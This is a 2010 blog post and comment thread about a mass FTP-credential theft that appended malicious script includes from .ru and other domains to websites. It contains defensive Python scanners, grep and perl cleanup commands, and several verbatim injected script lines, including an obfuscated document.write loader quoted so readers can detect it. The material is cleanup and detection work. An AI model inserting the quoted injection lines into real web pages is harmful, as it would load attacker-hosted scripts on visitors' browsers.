Getting pocketbloke.ru, inkrainbow.ru, pantsletter.ru JavaScript and PHP malware code injection hacks/infection? Get the fix here!
I have put together a PHP script that automatically removes all traces of this malicious code from your website. Upload the script to the root of your web directory, then open it in any browser. It supports folder and file recursion, file-extension filtering, automatic backups of every file it changes, and two modes of operation: search only, and search and fix.
Click here to see the .RU Removal Script in action! (demo)
or…
Click here for the .RU Removal Script Source Code
or here for it on PasteBin
Let me know in the comments if it works for you or if you have any feature requests!
Thanks to everyone commenting below, we have worked out that malware on your PC is stealing the FTP credentials saved for the websites you manage. The attackers then run an automated script that logs in to your site over FTP and appends a reference to their malicious JavaScript to the end of your PHP, HTML and JS files.
In JavaScript files it looks like this (the tag is split across string concatenations, so a naive search for "<script" will not find it):
document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/Template.js"></scri'+'pt>');
PHP or HTML files have the following appended at the end (note the trailing HTML comment containing a 32-character hex string):
<script type="text/javascript" src="http://inkrainbow.ru/Template.js"></script> <!--3848d52fcd665b3d7d96c22e5b6a5451-->
Here is a short list of some domain names that we’ve come across…
Known Malicious Domains:
- pocketbloke.ru
- inkrainbow.ru
- pantsletter.ru
- fightkid.ru
- shirtdifficulty.ru
- casechick.ru
- obscurewax.ru
- nuttypiano.com
- Many others… (comment domains you find below)
STEPS TO TAKE TO REMOVE THE THREAT:
- Run MalwareBytes and get rid of anything it finds on your machine
- Uninstall your FTP client, or at least delete every saved password from it (the malware reads the credentials the client has stored)
- Change your FTP passwords, and do it from a machine you know is clean, otherwise the new passwords are stolen straight away
- Update Java (see the CERT KB entry VU#886582 linked in the comments below)
- Remove all traces of the scripts from your domains; restoring from a backup taken before the infection is the cleanest option, and your FTP logs will show which accounts were used to upload the files
UPDATE (8/26/2010): More than just .RU domains are now involved, which means the script in its current state won't detect everything. I'm working on a better way to detect this. Any ideas? Comment below.
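The script the post describes is PHP and is linked above; as an added example that is not the post's code, here is a stand-alone Python equivalent of the behaviour it describes (recursion, extension filtering, a backup of every file changed, and a search-only mode). It matches both injection forms shown above, the plain <script> tag with its hex-comment marker and the split '<sc'+'ript' document.write() line, then strips only the includes whose host is on the blocklist, so legitimate external scripts survive. The domain list is the one on this page; the file extensions, the ".bak" suffix and the function names are my assumptions. Because the UPDATE says non-.RU domains are now involved, the scanner reports every external include it finds, not just the ones it removes, so you can spot new domains.

```python
"""Find external <script> includes appended to web files and strip the ones
that point at known-malicious domains. Added example, not the page's PHP
script; a stand-alone equivalent of the behaviour the post describes."""
import re
import shutil
import sys
from pathlib import Path
from urllib.parse import urlparse

# Domains named on the page plus nuttypiano.com from the comments.
KNOWN_BAD = (
    "pocketbloke.ru", "inkrainbow.ru", "pantsletter.ru", "fightkid.ru",
    "shirtdifficulty.ru", "casechick.ru", "obscurewax.ru", "nuttypiano.com",
)

# One pattern for both injection forms seen on the page:
#   document.write('<sc'+'ript type="text/javascript" src="http://..."></scri'+'pt>');   (JS files)
#   <script type="text/javascript" src="http://..."></script> <!--<32 hex chars>-->      (PHP/HTML)
# The '<sc'+'ript' split is what defeats a plain search for "<script".
INCLUDE_RE = re.compile(r"""
    (?:document\.write\(\s*')?           # optional document.write(' prefix
    <sc(?:'\+')?ript                     # <script, possibly split as '<sc'+'ript'
    [^>]*?\bsrc=["'](?P<src>https?://[^"']+)["'][^>]*>
    </scri(?:'\+')?pt>                   # </script>, possibly split
    (?:'\s*\);)?                         # closing '); of document.write
    (?:\s*<!--[0-9a-f]{32}-->)?          # optional hex marker comment
""", re.IGNORECASE | re.VERBOSE)


def host_of(url: str) -> str:
    return (urlparse(url).hostname or "").lower()


def is_suspect(src: str, blocklist=KNOWN_BAD) -> bool:
    """True if the include's host is a listed domain or a subdomain of one."""
    host = host_of(src)
    return any(host == d or host.endswith("." + d) for d in blocklist)


def find_includes(text: str):
    """Every external script include in text as (src, start, end) tuples."""
    return [(m.group("src"), m.start(), m.end()) for m in INCLUDE_RE.finditer(text)]


def clean_text(text: str, blocklist=KNOWN_BAD):
    """Strip suspect includes only; returns (new_text, removed_srcs)."""
    removed = []

    def repl(m):
        if is_suspect(m.group("src"), blocklist):
            removed.append(m.group("src"))
            return ""
        return m.group(0)          # legitimate include: leave it alone

    return INCLUDE_RE.sub(repl, text), removed


def scan_tree(root, extensions=(".php", ".html", ".htm", ".js", ".asp"),
              blocklist=KNOWN_BAD, fix=False, backup_suffix=".bak"):
    """Walk root, report every include found and, with fix=True, remove the
    suspect ones after copying the original to <file><backup_suffix>.
    Returns {path: [(src, is_suspect), ...]} for files that had any include."""
    report = {}
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in extensions:
            continue
        try:
            text = path.read_text(encoding="utf-8", errors="surrogateescape")
        except OSError:
            continue
        found = find_includes(text)
        if not found:
            continue
        report[str(path)] = [(src, is_suspect(src, blocklist)) for src, _, _ in found]
        if fix:
            new_text, removed = clean_text(text, blocklist)
            if removed:
                shutil.copy2(path, str(path) + backup_suffix)
                path.write_text(new_text, encoding="utf-8", errors="surrogateescape")
    return report


if __name__ == "__main__":
    # usage: python scan_includes.py /path/to/public_html [--fix]
    target = next((a for a in sys.argv[1:] if not a.startswith("--")), ".")
    do_fix = "--fix" in sys.argv
    for fname, includes in sorted(scan_tree(target, fix=do_fix).items()):
        for src, bad in includes:
            label = "REMOVED" if (bad and do_fix) else "SUSPECT" if bad else "include"
            print(f"{label:8} {fname} -> {src}")
```

Run it without --fix first and read the "include" lines: any domain you do not recognise goes on the blocklist before the second, fixing run. The backup copies let you diff what was changed, which matters given the comments below about the PHP script blanking whole files.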
Here it is (I called the php file russians-clean.php):
Warning: Wrong parameter count for preg_replace() in /home/flightsi/public_html/russians-clean.php on line 43
after many similar lines it said:
Done searching 32268 files in 34.17 seconds
Just ran the script as well. Wiped my forum clean… Nothing left on it. Perhaps look into it? Thank you for all the useful information though.
I have also suffered a few hacked pages this weekend.
Had a look at the script that was installed on my sites. Seems to be similar to the vulnerabilities described here http://www.exploit-db.com/exploits/12117/ and here http://www.kb.cert.org/vuls/id/886582
I guess I must have visited an infected site which launched some arbitrary Java code that read my filezilla.xml file and got my ftp passwords. It hadn't infected all my sites; it seemed to be working its way through them a-z.
Actions I have taken
I am running Windows XP SP2, Firefox 3.03, FileZilla 3.2.6.1
1. Remove passwords from FileZilla and select Logontype: “Ask for password” – check FileZilla.xml to make sure that passwords have been removed.
2. Change ftp usernames and passwords
3. Removed plugin Java Quickstarter from Firefox (npdeploytk.dll)
4. Disabled automatic Java updates which I think installed this plugin automatically
5. Fixed infected files by re-installing site backup.
Looking through my ftp log – all index.* and *.js files were infected.
Hope this helps
Fantastic work with the fix. Thanks!
New script works well.
I wonder how widespread this actually is? There are lots of reports of bank websites being unavailable over the last weekend and I wonder if the target for this virus wasn’t our little sites but a bigger fish…?
Just had a word with a colleague in France and he’s been done for 5 sites – was using FZ. Helping him clean up now.
It looks like there’s growing awareness of this-
http://www.wintercorn.com/article/225-new-malware-alert-pocketbloke-inkrainbow-and-pantsletter
Wonder how big it will all get?
Hi
My own website has been infested with this thing but as I’m just an average PC guy I’m not exactly sure how to run the fix.
I’ve uploaded it into the main dir of my website and tried to open it but that doesn’t seem to do anything.
What am I doing wrong?
-Al
Assuming you run a Linux server. Don’t know if it will run on Windows.
Upload it into your public directory and then type in yourdomain.com/filename.php, obviously replacing yourdomain and filename with the correct ones. It will then run and clean your site.
Thank you very much. I’ve tried doing it and it does seem like the site has indeed been cleaned up! I guess I’ll have to be more careful about storing passwords :p
@Default User
The script should run on either *nix based or Windows systems. I’m in the process now of writing a better, more interactive script that will show you what will be fixed before it edits your code. I should have it up shortly.
thanks for all your hard work dude!
Thank you so much…this seems to have done the trick. I had some code that was fightkid.ru as well.
Hi Nate,
I finally found the files that are messing up your script, making it clean out ENTIRE files instead of just replacing the offending code. Hope you can use it somehow. I have now reverted back to downloading the entire sites, cleaning them with Dreamweaver’s editor, then uploading them again. Especially for WordPress sites there seem to be some problems at times, where links are no longer working.
I also found at least one of my sites had ‘bad’ database backups, so I couldn’t restore from a backup made AFTER the infection. Not sure if it has anything to do with all this though.
Anyway, the files that apparently are being a problem for your scanner are named something like this:
.wysiwygPro_edit_61a73fa3aa5fd7cba2bed0366aa8ec58.php
There’s weird code inside too (I have a copy if you want).
Apparently these files are put onto one’s root when using an editor from the cPanel application (which I use on all of my sites to manage them). I do NOT use that editor often (certainly not knowingly), so that may explain why I only have it on 3 of my 31 sites.
Francois
Francois is spot on: my WYSIWYG editor isn’t working after running the cleaner script.
@Francois
Francois,
Please e-mail me a copy to nate _a@t_ natestiller.com and I will be able to fix the script.
Thanks
@Carlos
Check out the new script!
@Björn
No problem man! Check out the new script and let me know how it works for you!
I also have several sites contaminated pocketbloke.ru
Today was a new attack and insertion site is nuttypiano.com
Other people also have FTP access to the hacked websites. Is FileZilla the cause?
Thank you, Martin
@Martin .. did you clean your PC first? Need to run anti-malware and virus checker and make sure your protection is in order (Shields Up Scotty !!!). The actual virus stopped my (Windows) firewall and Security Center.
Also make sure you have changed all site’s passwords (main and ftp) and preferably do not save them in the ftp client anymore after that (I know I can’t, with over 30 sites, back-ends and other admin accesses to them, I would go crazy typing them in every time).
@Nate
Willdo Nate….. been too busy to read here, sorry.
Well, they are using .com domains now too, not only Russian domains.
New malicious domain with this kind of script injection.
nuttypiano.com
here is the injection:
On javascript files:
document.write(”);
On php, asp, html, htm files:
@Marvin
Sorry, paste direct code:
correct:
On javascript files:
document.write('<sc'+'ript type="text/javascript" src="http://nuttypiano.com/Vector_Graphic.js"></scri'+'pt>');
On php, asp, html, htm files:
<script type="text/javascript" src="http://nuttypiano.com/Hardware.js"></script>
@Marvin
So you have not cleaned your PC yet…… as far as I have been able to assess the virus itself sits on your own PC, reading your ftp client(s), and getting access to your websites through there.
You’ll need to clean up the PC first, before cleaning your websites is any use. Maybe you have others accessing your site(s) too?
@Francois
I cleaned my pc and all my websites. One of them was infected with this domain that isn’t part of my websites.
I had this problem, and used the following (linux command line) commands to get it off:
1. Search for infected files – change to the bottom, or root directory of your websites (for me it was /home), and run this command:
grep -rHE 'https?://[A-Za-z0-9.-]+\.ru' ./
or
grep -rH 'Password.js' ./
or
grep -rH 'Kibibyte.js' ./
etc
(put what you are searching for between the “”)
2. to remove the hack, i just changed the link of the script to javascript:void() using this command:
find ./ -type f -name '*.html' -print0 | xargs -0 perl -pi -w -e 's{http://yellowbarn\.ru/Kibibyte\.js}{javascript:void(0)}g'
or
find ./ -type f -name '*.php' -print0 | xargs -0 perl -pi -w -e 's{http://yellowbarn\.ru/Kibibyte\.js}{javascript:void(0)}g'
notice that each command ends with the extensions you want to search, ie. *.html, *.php, *.js, etc
Worked for me. Make sure you change your FTP passwords on a machine that IS NOT infected with the trojan/virus.
one last note – I realize this isn’t a perfect solution – you probably could use *.* at the end of the find commands above, but you probably don’t need to search/replace in EVERY file on your server. I also realize you have to know the name of the domain name and/or name of the javascript file that is being called beforehand…..
Cheers,
Clarkson
@Francois
1) Yes, I cleaned the PC and then changed the FTP password, which I have not saved in the client (I use FreeCommander, not FileZilla; I only ask because my colleague uses FileZilla).
Among the infected sites was one that I have never accessed from my FTP client, so I don’t think the infection is on my machine; when I cleaned my PC, malwarebytes.com found nothing.
A third colleague uses Total Commander (!), but malwarebytes.com found nothing in his scan either …
So does it depend on your FTP client … or not?
2) I won’t have to save the password in the FTP client, but it has to be stored somewhere, in a txt file for example, and copied via the clipboard every time I log in to FTP. Is that safe?
Thank you, Martin
@Clarkson
Yes, and it appears there are more and more popping up, so how do we find them ????
Search for ‘.ru’ and then filter the malware out. It’s possible that some files have a legit .ru domain in them, can’t imagine why though.
Alright, I found the latest problem. One of my sites gets pointed to via another (of a former partner). HE has not changed the password, so THAT one got infected again (!!), giving warnings to people using that old domain name.
I threw everything away now and alerted him to change the passwords.
So I think my sites remain clean…. phew !!!
@Martin (not Marvin): yes, you can save your passwords in a text file instead of your ftp client. The virus will probably only scan for known ftp programs.
On the other hand, it is even better storing them ‘off-line’ and encrypted. I have all my passwords on a USB stick, encrypted, from Roboform.
For ftp I use CoreFTP lite and Direct FTP by CoffeeCup software.
I don’t think it makes a difference which one you use.
@Navvie
Thank you for your advice.
I will not have passwords saved in the FTP client, but I still have to copy the password through the clipboard to connect. Isn’t it quite possible that the virus detects a new FTP connection and reads the last entry in the clipboard? Then I would have to type the password in manually, which is really bad.
Could a USB keychain and RoboForm help with that clipboard problem? (Roboform.com is new to me.)
@Martin
* I will not have passwords stored in the FTP client….
So it appears that not only .RU domains are involved which makes this more difficult. I just found a nuttypiano.com on another one of my websites. I think I’m going to edit the script to pull any JavaScript inclusions and then you can choose which to remove.
Any ideas?
@SOB
Thanks SOB for the help! Good call on the CERT KB. However, it looks like this is a newer attack vector using an old vulnerability.
not sure about how this trojan/virus is gleaning the FTP credentials….. in my case, I don’t even use FileZilla – I use Dreamweaver CS5 – and yes, the FTP credentials are stored on my system, via Dreamweaver.
I’m fairly sure only one other person had the FTP credentials, and she was using a Mac, so it’s unlikely it was her – more likely me on a PC. But again – I don’t use filezilla – not even installed here.
It might work as a proxy, ie, it will listen and catch ANY ftp traffic to and from your computer, regardless if it comes from Filezilla, Dreamweaver, etc..
@Nate
For me, any file that had the hack with the script line, it was ALWAYS at the bottom of the page, right before the tag.
Surf the website in question, View Source in your browser, and scroll all the way to the bottom – look for the hack, make note of the domain name/js file being called. On Joomla sites, make sure you login to the administrator part, and view source again – most of my Joomla sites had the hack in the main pages AND the admin.
This is my experience only, perhaps for others the hack is being placed somewhere else in the code, but for me, every single time last line of code. Makes it easier to find
Keep in mind that the virus that steals these passwords also “sniffs” the FTP traffic leaving the PC.
In order to block this you should see if your hosting provider supports SFTP. It encrypts the traffic making it more difficult to sniff.
Just looking through the FTP logs for the attack day for one site and I noticed that the bot cycles through dozens of different IP address from all over the world over a 2 hour period and hit 1756 files.
The attacks are milliseconds apart but difficult to prevent as they are from normal ISP’s in Canada, Europe, USA etc.
@Default User
Yup, I went through my logs too. Turned up 34 different IP unique addresses, although many were used multiple times and on different domains.
Looking at the diversity I would say all servers were hacked already for that purpose. Some were of Internet hosts !
@Nate Yes, I too can confirm that ALL injected code was in the last lines of the .html and .js program sources. Files infected that I found were only combinations with ‘index’ and ‘main’ in the filename and just about all .js files.
For some strange reason NOT all files in all folders were altered. And not all of my sites, although many more were stored in my ftp client. But I also did NOT actually access the domains that were hit during the time I had the virus working on my main PC.
So for some reason it missed some sites and/or passwords.
Hi
Thanks for doing this for us non-technical people.
However, I’m very frustrated as I ran the .php on ONE of my sites and it gave every impression of working so I have submitted it for review.
But I can’t for the life of me make it run on a second one (it just displays the code) and can’t think what I’ve done differently.
I downloaded the file, which was a .txt
Rename it to .php and transferred it to my site at the same level as my index.html file
Remembered to change attributes to make it executable
In my browser, typed
domain/russianhackcleaner.php
Got the usual warning message, ignored it
But then it just displays the code, and won’t execute it
Any ideas gratefully accepted.
Thanks for this script, Nate! Google flagged three files that had the nuttypiano.com link but your script found another 60 or so.
There are so many files on my site (user-created) that the script timed out before recursing through all of it, so I modified the script to do one directory at a time. To do the /01/ directory, for example, I changed it to:
$files = directoryToArray("./01/", $recurse);
Once I did that, though, I couldn’t use the cleanup part of the script. It choked on line 100 with a “wrong number of parameters” error or something like that.
I imagine I’ll need to run this script again in the future, so I hope you’ll continue to refine it. Thanks again!
Hi Nate,
have you found a way to find the nuttypiano files, too?
Cheers
Philipp
@Joy
Joy,
Does this domain have PHP installed on it? Shoot me an e-mail at “nate[at}natestiller.com” if you can’t get it working.
@Philipp
I’m working on a new version that will show you everything that it “suspects” and then you can choose what to remove. This is so it won’t break anything on your site.
Discovered my problem was that php not allowed! Duh
I use WordPress and I cannot make it work wherever I copy the script. =/
Something that might limit the amount of hunting you have to do:
Since we know the attack vector is via FTP, check your FTP logs first – as noted by Navvie above, the attacks are easy to spot: hundreds, if not thousands of different hosts uploading files to same account, concurrently.
make note of the account(s) being attacked, and change the FTP passwords on those accounts immediately.
Now that you know what accounts were being attacked/hacked, limit your searches using either Nate’s great tool, or other manual methods listed above, to only those accounts. Now you don’t have to search through your entire FTP file system on the server.
Cheers
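The log pattern described in the comments above (the bot cycling through dozens of source addresses and uploading to one account within a couple of hours) is easy to pull out of a transfer log automatically. The following is an added example, not code from the post or its commenters; it assumes the classic wu-ftpd style xferlog format that ProFTPD writes by its TransferLog directive and that Pure-FTPd can write with "AltLog xferlog:", and the thresholds, function names and the constructed sample log are my own choices. It groups uploads (direction "i") per account, counts distinct client addresses and the time span, and flags accounts that were written to from many addresses in a short window, which is exactly the per-account triage the comment suggests doing before you start searching files.

```python
"""Flag FTP accounts that received uploads from many different client
addresses in a short window (the credential-abuse pattern the comments
describe). Added example; assumes wu-ftpd style xferlog lines."""
import re
import sys
from collections import defaultdict
from datetime import datetime, timedelta

# xferlog fields: current-time transfer-time remote-host file-size filename
# transfer-type special-action-flag direction access-mode username
# service-name authentication-method authenticated-user-id completion-status
XFERLOG_RE = re.compile(
    r"^(?P<ts>\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4}) "
    r"(?P<xfer>\d+) (?P<host>\S+) (?P<size>\d+) (?P<file>\S+) "
    r"(?P<type>[ab]) (?P<action>\S) (?P<dir>[oid]) (?P<mode>[agr]) "
    r"(?P<user>\S+) (?P<service>\S+) (?P<auth>\d) (?P<authuser>\S+) (?P<status>[ci])$"
)


def parse_xferlog(lines):
    """Yield one dict per well-formed line; malformed lines are skipped."""
    for line in lines:
        m = XFERLOG_RE.match(line.strip())
        if not m:
            continue
        rec = m.groupdict()
        rec["when"] = datetime.strptime(rec["ts"], "%a %b %d %H:%M:%S %Y")
        yield rec


def summarize_uploads(records):
    """Per account: distinct client IPs, upload count, files written, time span."""
    acc = defaultdict(lambda: {"ips": set(), "uploads": 0, "files": set(),
                               "first": None, "last": None})
    for r in records:
        if r["dir"] != "i":            # 'i' = incoming transfer, i.e. an upload
            continue
        a = acc[r["user"]]
        a["ips"].add(r["host"])
        a["uploads"] += 1
        a["files"].add(r["file"])
        a["first"] = r["when"] if a["first"] is None else min(a["first"], r["when"])
        a["last"] = r["when"] if a["last"] is None else max(a["last"], r["when"])
    return dict(acc)


def flag_accounts(summary, min_ips=5, min_uploads=20, max_minutes=180):
    """Accounts whose uploads came from at least min_ips distinct addresses,
    at least min_uploads times, all inside max_minutes. The thresholds are
    assumptions; tune them to your own normal traffic."""
    flagged = []
    for user, a in summary.items():
        span = a["last"] - a["first"]
        if (len(a["ips"]) >= min_ips and a["uploads"] >= min_uploads
                and span <= timedelta(minutes=max_minutes)):
            flagged.append((user, len(a["ips"]), a["uploads"], span))
    return sorted(flagged, key=lambda f: f[1], reverse=True)


def constructed_log():
    """Constructed sample, not real data: one account hammered from eight
    addresses over ~90 minutes, plus one admin's ordinary activity."""
    ips = ["203.0.113.%d" % n for n in (5, 17, 42, 77, 91, 120, 133, 201)]
    t0 = datetime(2010, 8, 21, 2, 10, 0)
    lines = []
    for n in range(24):
        ts = (t0 + timedelta(minutes=4 * n)).strftime("%a %b %d %H:%M:%S %Y")
        path = "/public_html/index.php" if n % 2 else "/public_html/js/main.js"
        lines.append(f"{ts} 0 {ips[n % len(ips)]} 1423 {path} b _ i r siteuser ftp 0 * c")
    lines += [
        "Sat Aug 21 09:00:00 2010 1 198.51.100.8 2048 /public_html/about.html b _ o r bob ftp 0 * c",
        "Sat Aug 21 09:01:30 2010 1 198.51.100.8 2100 /public_html/about.html b _ i r bob ftp 0 * c",
        "Sat Aug 21 09:02:05 2010 0 198.51.100.8 512 /public_html/css/site.css b _ i r bob ftp 0 * c",
        "this line is not in xferlog format",
    ]
    return lines


if __name__ == "__main__":
    # usage: python ftp_burst.py /var/log/xferlog   (no argument: run on the sample)
    if len(sys.argv) > 1:
        with open(sys.argv[1]) as fh:
            lines = fh.read().splitlines()
    else:
        lines = constructed_log()
    for user, n_ips, n_up, span in flag_accounts(summarize_uploads(parse_xferlog(lines))):
        print(f"{user}: {n_up} uploads from {n_ips} IPs in {span}")
```

The "files" set in each summary entry is the list of paths the bot actually wrote, so once an account is flagged you can restrict the file search to exactly those paths and change that account's password first.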
Thanks for the script, really appreciate your work here.
I have this hack on 6 hosting accounts now and each account has 100k+ files as each account has about 100 domains with wordpress installed on it
My site vidyaweb.com was also taken down by infection from pocketbloke.ru. I made do by using Filezilla without saving passwords in the Quickconnect Bar for a week. Today, I scanned my PC and discovered two suspected hidden files kkypqe.sys and frtisc.sys in the folder c:\windows\system32\drivers suspected to be rootkits by Avira anti virus, with hidden registry keys with the same name. However, Avira was not able to delete them and I had to resort to booting through Linux and deleting the suspected files.
Thereafter, I was also able to delete the registry keys too, but only after changing permissions on them. Besides these, no other infection was detected by Avira.
Can I safely assume now that I am free of malware and start trusting Filezilla again?